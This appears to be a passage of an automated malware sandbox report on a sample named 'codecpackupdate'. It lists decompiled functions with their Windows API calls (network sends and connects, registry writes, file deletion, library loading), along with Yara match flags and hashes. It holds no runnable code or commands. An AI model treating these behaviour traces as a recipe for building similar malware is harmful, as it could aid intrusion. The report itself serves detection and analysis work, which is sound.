                                                                          Function 009F2DB5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 009F2D39: WSASetLastError.WS2_32(00000000), ref: 009F2D47
                                                                            • Part of subcall function 009F2D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 009F2D5C
                                                                          • WSASetLastError.WS2_32(00000000), ref: 009F2E6D
                                                                          • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 009F2E83
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast$Sendselect
                                                                          • String ID: 3'
                                                                          • API String ID: 2958345159-280543908
                                                                          • Opcode ID: 3a222178ea703f5d52080c78c0d73cfb6eea68e61438407d48473288933b7e45
                                                                          • Instruction ID: e35dea037f1cf01f3a900e3e13ac2ba0f90b07a650dcebcdd36997c77c16cbda
                                                                          • Opcode Fuzzy Hash: 3a222178ea703f5d52080c78c0d73cfb6eea68e61438407d48473288933b7e45
                                                                          • Instruction Fuzzy Hash: E331CDB0E0030D9FDF10DFA0D806BFE7BB9AF48364F104559EA09D7281E7B499458BA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F2AC7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WSASetLastError.WS2_32(00000000), ref: 009F2AEA
                                                                          • connect.WS2_32(?,?,?), ref: 009F2AF5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLastconnect
                                                                          • String ID: 3'
                                                                          • API String ID: 374722065-280543908
                                                                          • Opcode ID: 437ca5772bf10e842f1be8c55d5256fc7b00b2a7ddda7a359aeb1d7e4fb1c02c
                                                                          • Instruction ID: aa359dd62a2dac1b446022054179303a613d6cc10098bfd5f8fefcfa6de5be68
                                                                          • Opcode Fuzzy Hash: 437ca5772bf10e842f1be8c55d5256fc7b00b2a7ddda7a359aeb1d7e4fb1c02c
                                                                          • Instruction Fuzzy Hash: 8C21C670E0020CABCF14EFA4D505BFEBBB9EF85321F108159ED19D7281DB748A028B91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F353E Relevance: 4.6, APIs: 3, Instructions: 127COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog
                                                                          • String ID:
                                                                          • API String ID: 3519838083-0
                                                                          • Opcode ID: 881c8be00c89de65423f84902410ad4697b8bb030b4a0026186a2cc2042ab3e9
                                                                          • Instruction ID: e710ecef1a6012b64c5a00c37f3681a358dfe1065cec6e3d42d4fcc13a1ce23b
                                                                          • Opcode Fuzzy Hash: 881c8be00c89de65423f84902410ad4697b8bb030b4a0026186a2cc2042ab3e9
                                                                          • Instruction Fuzzy Hash: 73513EB190421ADFCB04DF68D541BAABBB4FF48310F14C15DF9299B391D7749A11CBA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F369A Relevance: 4.6, APIs: 3, Instructions: 60COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InterlockedIncrement.KERNEL32(?), ref: 009F36A7
                                                                            • Part of subcall function 009F2420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 009F2432
                                                                            • Part of subcall function 009F2420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 009F2445
                                                                            • Part of subcall function 009F2420: RtlEnterCriticalSection.NTDLL(?), ref: 009F2454
                                                                            • Part of subcall function 009F2420: InterlockedExchange.KERNEL32(?,00000001), ref: 009F2469
                                                                            • Part of subcall function 009F2420: RtlLeaveCriticalSection.NTDLL(?), ref: 009F2470
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                                          • String ID:
                                                                          • API String ID: 1601054111-0
                                                                          • Opcode ID: a2b40948ee6da0f992dc5619e0c2cc4e9c13aa7ef4d03587ba5ca90377afee23
                                                                          • Instruction ID: da9b57ca03fb6d0a5280fc55ca1875ac9a3fb6dd8eabcd1c540ee7d20859c55b
                                                                          • Opcode Fuzzy Hash: a2b40948ee6da0f992dc5619e0c2cc4e9c13aa7ef4d03587ba5ca90377afee23
                                                                          • Instruction Fuzzy Hash: 4B11C1B510420DABDF21AF54CC86FBA3B69EF44350F108516FF12CA2E0CB78DA619B94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A02030 Relevance: 4.5, APIs: 3, Instructions: 42threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __beginthreadex.LIBCMT ref: 00A02046
                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,00000002,009FA8BC,00000000), ref: 00A02077
                                                                          • ResumeThread.KERNELBASE(?,?,?,?,?,00000002,009FA8BC,00000000), ref: 00A02085
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseHandleResumeThread__beginthreadex
                                                                          • String ID:
                                                                          • API String ID: 1685284544-0
                                                                          • Opcode ID: 13ec9ac59bc253088c557332cc897830248e98d0fb7fc6adfff897e5d524eeca
                                                                          • Instruction ID: a7d7c54fe7703423b358edd730d04c50542d0de3608c710396b74f106eddd20f
                                                                          • Opcode Fuzzy Hash: 13ec9ac59bc253088c557332cc897830248e98d0fb7fc6adfff897e5d524eeca
                                                                          • Instruction Fuzzy Hash: 97F0AF71200304ABD7209FA8EC84B9573A8AF48321F24452AF148D72D0C361AC82CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F1AA9 Relevance: 4.5, APIs: 3, Instructions: 18networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InterlockedIncrement.KERNEL32(00A2727C), ref: 009F1ABA
                                                                          • WSAStartup.WS2_32(00000002,00000000), ref: 009F1ACB
                                                                          • InterlockedExchange.KERNEL32(00A27280,00000000), ref: 009F1AD7
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Interlocked$ExchangeIncrementStartup
                                                                          • String ID:
                                                                          • API String ID: 1856147945-0
                                                                          • Opcode ID: 10b4ccdbf1197908eb29ccf5b37ebce38dc5fa770db4f6b19b70342395629b89
                                                                          • Instruction ID: 45745674e4bc455b0a054296e90352d1c11af8b50232c2638f00dff6aabf6fc0
                                                                          • Opcode Fuzzy Hash: 10b4ccdbf1197908eb29ccf5b37ebce38dc5fa770db4f6b19b70342395629b89
                                                                          • Instruction Fuzzy Hash: 36D05E71589318ABD220E7E4BD0EAFC773CF709711F401761FD69C00D0EA515A1086A6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040223C Relevance: 4.5, APIs: 3, Instructions: 12timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCommandLineW.KERNEL32 ref: 0040223C
                                                                          • CommandLineToArgvW.SHELL32(00000000), ref: 0040B040
                                                                          • GetLocalTime.KERNEL32(00409FB8), ref: 0040B942
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: CommandLine$ArgvLocalTime
                                                                          • String ID:
                                                                          • API String ID: 3768950922-0
                                                                          • Opcode ID: f727ac15d8a02c0163e01fb7637a754121b5fc1ed335fb52cb76b17d48f4068b
                                                                          • Instruction ID: fe59c91cec6a1bbfec2f2a739a0674a99631b7336b4ea49b5c82aa235aaf9e13
                                                                          • Opcode Fuzzy Hash: f727ac15d8a02c0163e01fb7637a754121b5fc1ed335fb52cb76b17d48f4068b
                                                                          • Instruction Fuzzy Hash: F4D01273448012EBC2007BE19A0E99D37E5A64A3523224077F243F11E1CB3C44959B6F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F4BED Relevance: 3.1, APIs: 2, Instructions: 137COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009F4BF2
                                                                            • Part of subcall function 009F1BA7: __EH_prolog.LIBCMT ref: 009F1BAC
                                                                            • Part of subcall function 009F1BA7: RtlEnterCriticalSection.NTDLL ref: 009F1BBC
                                                                            • Part of subcall function 009F1BA7: RtlLeaveCriticalSection.NTDLL ref: 009F1BEA
                                                                            • Part of subcall function 009F1BA7: RtlEnterCriticalSection.NTDLL ref: 009F1C13
                                                                            • Part of subcall function 009F1BA7: RtlLeaveCriticalSection.NTDLL ref: 009F1C56
                                                                            • Part of subcall function 009FE02B: __EH_prolog.LIBCMT ref: 009FE030
                                                                            • Part of subcall function 009FE02B: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009FE0AF
                                                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 009F4CF2
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                                          • String ID:
                                                                          • API String ID: 1927618982-0
                                                                          • Opcode ID: 7ea3fcd13abc419d9a5c4f9d49d0d36fad1d8e0bda1178c293ed290c9afdab1f
                                                                          • Instruction ID: 586e652295b9ed14606c48389a1edfdbb35c1f56ce128280e89f2027ef7be91c
                                                                          • Opcode Fuzzy Hash: 7ea3fcd13abc419d9a5c4f9d49d0d36fad1d8e0bda1178c293ed290c9afdab1f
                                                                          • Instruction Fuzzy Hash: 3F510B71D0424CDFDB15DFA8D485BEEBBB8AF48310F14815AEA05AB352DB709A44CB50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F2D39 Relevance: 3.0, APIs: 2, Instructions: 50networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WSASetLastError.WS2_32(00000000), ref: 009F2D47
                                                                          • WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 009F2D5C
                                                                            • Part of subcall function 009FA43C: WSAGetLastError.WS2_32(00000000,?,?,009F2A51), ref: 009FA44A
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast$Send
                                                                          • String ID:
                                                                          • API String ID: 1282938840-0
                                                                          • Opcode ID: 8bd99fa224babf59bc31dda5d5e37a7ac2bef6a15fbb31dcfcd4007b537584fe
                                                                          • Instruction ID: 5f794e620723a318bb6a0e900a3698058dd7d6c6cea41200d24a51dab1758e41
                                                                          • Opcode Fuzzy Hash: 8bd99fa224babf59bc31dda5d5e37a7ac2bef6a15fbb31dcfcd4007b537584fe
                                                                          • Instruction Fuzzy Hash: 120171B550420DEFD7209F949944DBBBAECFB45361B20452EF95983280DB749D008B61
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F831D Relevance: 3.0, APIs: 2, Instructions: 32networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WSASetLastError.WS2_32(00000000), ref: 009F833A
                                                                          • shutdown.WS2_32(?,00000002), ref: 009F8343
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLastshutdown
                                                                          • String ID:
                                                                          • API String ID: 1920494066-0
                                                                          • Opcode ID: 1b911946899e7ca7c26c65f30ae053f480ee0dc2bc9fece646e0f9a2b0144cc4
                                                                          • Instruction ID: 5d15c60f081e20b1ac4155a147b2172eff50f2ce620bd28f9c3df2cb78c7c3b3
                                                                          • Opcode Fuzzy Hash: 1b911946899e7ca7c26c65f30ae053f480ee0dc2bc9fece646e0f9a2b0144cc4
                                                                          • Instruction Fuzzy Hash: 99F090B1A04318CFC714AF58D405FAA77E4BF08721F00841CEA9997391DB74AC018BA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040325A Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,00402F81,00000000), ref: 0040326B
                                                                            • Part of subcall function 00403112: GetVersionExA.KERNEL32 ref: 00403131
                                                                          • HeapDestroy.KERNEL32 ref: 004032AA
                                                                            • Part of subcall function 004032B7: HeapAlloc.KERNEL32(00000000,00000140,00403293,000003F8), ref: 004032C4
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocCreateDestroyVersion
                                                                          • String ID:
                                                                          • API String ID: 2507506473-0
                                                                          • Opcode ID: 401029335cdd060f4c3739ebb86f5453ce87962896cee6a98a7773047d595e2a
                                                                          • Instruction ID: bdc1dc1f8be9f1a85e4812a31df9c453441b6f572615afd11c7cbbe7009e603d
                                                                          • Opcode Fuzzy Hash: 401029335cdd060f4c3739ebb86f5453ce87962896cee6a98a7773047d595e2a
                                                                          • Instruction Fuzzy Hash: 08F0E5319043015AEF245F306E463263EA8DB50397F1184BFF401F82D1EB78C790950A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004026BA Relevance: 3.0, APIs: 2, Instructions: 12registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegSetValueExA.KERNELBASE(?), ref: 0040BB89
                                                                          • RegCloseKey.KERNELBASE(?), ref: 0040BBA1
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: CloseValue
                                                                          • String ID:
                                                                          • API String ID: 3132538880-0
                                                                          • Opcode ID: e5558a01befb399580d90c15d8e77e87dddf6eb678b6b853077a7300c8dcf38d
                                                                          • Instruction ID: 3cbe291bb339146179499fcb751b8313bc5c9d0f62fdf094b2037c6fd71a0925
                                                                          • Opcode Fuzzy Hash: e5558a01befb399580d90c15d8e77e87dddf6eb678b6b853077a7300c8dcf38d
                                                                          • Instruction Fuzzy Hash: 47D0C971808002FFCB150B909E088293E79FB04350B200032E243708E4C7392462FAAF
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F5119 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009F511E
                                                                            • Part of subcall function 009F3D7E: htons.WS2_32(?), ref: 009F3DA2
                                                                            • Part of subcall function 009F3D7E: htonl.WS2_32(00000000), ref: 009F3DB9
                                                                            • Part of subcall function 009F3D7E: htonl.WS2_32(00000000), ref: 009F3DC0
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: htonl$H_prologhtons
                                                                          • String ID:
                                                                          • API String ID: 4039807196-0
                                                                          • Opcode ID: 30695b8a1cf7c479ddc60c4fadb2fe4f973011b2507fe85a61ab956cfc49904e
                                                                          • Instruction ID: 99556be3c81a7d3e25cd6ca393513d9c047d4a22de71868e6b35e990e30f71c7
                                                                          • Opcode Fuzzy Hash: 30695b8a1cf7c479ddc60c4fadb2fe4f973011b2507fe85a61ab956cfc49904e
                                                                          • Instruction Fuzzy Hash: 7E8159B1D0424ECECF05DFA8D480AFEBBB8AF48310F14815AEA54B7241EA756A05CF75
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A3B0CF Relevance: 1.6, APIs: 1, Instructions: 94fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.0000000000A2A000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A2A000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_a2a000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: 2b75b581af97edd669f649b30272867d2ed96aa0e0b886ab7eaca5550e5ae247
                                                                          • Instruction ID: 6d7aa1879b2d059c98c5806101343b454673fcea30e929d8a70c605ca080bdcd
                                                                          • Opcode Fuzzy Hash: 2b75b581af97edd669f649b30272867d2ed96aa0e0b886ab7eaca5550e5ae247
                                                                          • Instruction Fuzzy Hash: 272136F390C6106BE7017E2EDC84629B7E9EFD8320F1A453DDBC143704F97068008692
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009FE8F4 Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009FE8F9
                                                                            • Part of subcall function 009F1A01: TlsGetValue.KERNEL32 ref: 009F1A0A
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prologValue
                                                                          • String ID:
                                                                          • API String ID: 3700342317-0
                                                                          • Opcode ID: eb479164d09457e604f03c2a88a2202aa74983d824afea169b73c66f7ecf9683
                                                                          • Instruction ID: d45ae5bfb45c36e99450b98dd230ea6ce0bd276138e96ab319c02d2482229208
                                                                          • Opcode Fuzzy Hash: eb479164d09457e604f03c2a88a2202aa74983d824afea169b73c66f7ecf9683
                                                                          • Instruction Fuzzy Hash: BA214FB1905209AFDB00DFA4D541AFEBBF9EF48310F10441EEA18E7251D775A940CBA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F33B2 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 009F33CC
                                                                            • Part of subcall function 009F32AB: __EH_prolog.LIBCMT ref: 009F32B0
                                                                            • Part of subcall function 009F32AB: RtlEnterCriticalSection.NTDLL(?), ref: 009F32C3
                                                                            • Part of subcall function 009F32AB: RtlLeaveCriticalSection.NTDLL(?), ref: 009F32EF
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$CompareEnterExchangeH_prologInterlockedLeave
                                                                          • String ID:
                                                                          • API String ID: 1518410164-0
                                                                          • Opcode ID: 0e7df1038251e186f0cc8fdc7e8d6f6c765962a1e52c3162e7e87102434b5721
                                                                          • Instruction ID: ebea8022824bd9cca92659f5a9b5ab4c8115dcf8b2bf53267bf205d068e74e7c
                                                                          • Opcode Fuzzy Hash: 0e7df1038251e186f0cc8fdc7e8d6f6c765962a1e52c3162e7e87102434b5721
                                                                          • Instruction Fuzzy Hash: F901447121460AAFD704DF59D885F65B7A9FF45320F10C319E929872D1EB70ED11CBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A6020E Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DeleteFileA.KERNELBASE(4660960D), ref: 00A8E376
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.0000000000A2A000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A2A000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_a2a000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteFile
                                                                          • String ID:
                                                                          • API String ID: 4033686569-0
                                                                          • Opcode ID: e0da2dffa4f581ab40d4b91ad567db9e8151d84cf028e1dfece08c4088839a33
                                                                          • Instruction ID: 9b4da54cac07c2c577e0c256c75d1f5ef9ad045d0a7f3b35db068f63db0e32a5
                                                                          • Opcode Fuzzy Hash: e0da2dffa4f581ab40d4b91ad567db9e8151d84cf028e1dfece08c4088839a33
                                                                          • Instruction Fuzzy Hash: F20104F250CA10ABE3097F0AD8816BEFBF8EF94311F06482DE2C583710E67054808B97
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004026E2 Relevance: 1.5, APIs: 1, Instructions: 39libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryExA.KERNELBASE(?,00000000), ref: 0040B8D6
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: 938891c41c19957031571cb3cd7cef40cfb462982efdf7795ef8d5ecdca5ac57
                                                                          • Instruction ID: 6231b04622782da76f8fb29558b74f8e19658c67226029681e8db2cc7872a652
                                                                          • Opcode Fuzzy Hash: 938891c41c19957031571cb3cd7cef40cfb462982efdf7795ef8d5ecdca5ac57
                                                                          • Instruction Fuzzy Hash: 3AF09035214306DBEB10EE64CD84B7237A4EB14340F64843BEC46EA2D1E7B8D9429B9E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009FE484 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009FE489
                                                                            • Part of subcall function 009F26DB: RtlEnterCriticalSection.NTDLL(?), ref: 009F2706
                                                                            • Part of subcall function 009F26DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 009F272B
                                                                            • Part of subcall function 009F26DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A15A93), ref: 009F2738
                                                                            • Part of subcall function 009F26DB: SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 009F2778
                                                                            • Part of subcall function 009F26DB: RtlLeaveCriticalSection.NTDLL(?), ref: 009F27D9
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                          • String ID:
                                                                          • API String ID: 4293676635-0
                                                                          • Opcode ID: 46cc6dfaa660f9be7187593c9aa00dad85fd117ade79d73be4113fae0a79fe1a
                                                                          • Instruction ID: bdeed5c2114172ae230c25a04f0482cef3a9181c5560eb7640ee540f2a1a61eb
                                                                          • Opcode Fuzzy Hash: 46cc6dfaa660f9be7187593c9aa00dad85fd117ade79d73be4113fae0a79fe1a
                                                                          • Instruction Fuzzy Hash: 6401DCB0810B08DFC318CF1AC144A89FBF4FF88310B05C5AE94498B322E3B1AA80CF94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009FE263 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009FE268
                                                                            • Part of subcall function 00A03A8F: _malloc.LIBCMT ref: 00A03AA7
                                                                            • Part of subcall function 009FE484: __EH_prolog.LIBCMT ref: 009FE489
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog$_malloc
                                                                          • String ID:
                                                                          • API String ID: 4254904621-0
                                                                          • Opcode ID: 3b4dfe31c25a114de0719f0588eaa7e3248c1db0cc08f5789913045fb6c19e25
                                                                          • Instruction ID: abba09f749816eb28cd1e542125c5e06008b16c1ba6d3ce9cab85600765ab1d9
                                                                          • Opcode Fuzzy Hash: 3b4dfe31c25a114de0719f0588eaa7e3248c1db0cc08f5789913045fb6c19e25
                                                                          • Instruction Fuzzy Hash: 6CE0C271A0010DAFCF4CDFA8E9127BDB7A9EB44340F00426EB808D6690EF708E108744
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A03395 Relevance: 1.5, APIs: 1, Instructions: 19COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00A05B9A: __getptd_noexit.LIBCMT ref: 00A05B9B
                                                                            • Part of subcall function 00A05B9A: __amsg_exit.LIBCMT ref: 00A05BA8
                                                                            • Part of subcall function 00A033D6: __getptd_noexit.LIBCMT ref: 00A033DA
                                                                            • Part of subcall function 00A033D6: __freeptd.LIBCMT ref: 00A033F4
                                                                            • Part of subcall function 00A033D6: RtlExitUserThread.NTDLL(?,00000000,?,00A033B6,00000000), ref: 00A033FD
                                                                          • __XcptFilter.LIBCMT ref: 00A033C2
                                                                            • Part of subcall function 00A08CD4: __getptd_noexit.LIBCMT ref: 00A08CD8
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
                                                                          • String ID:
                                                                          • API String ID: 1405322794-0
                                                                          • Opcode ID: a697c161d1907d6f93caa1ae62d4d9161d741e116a09679514cdef925c12965b
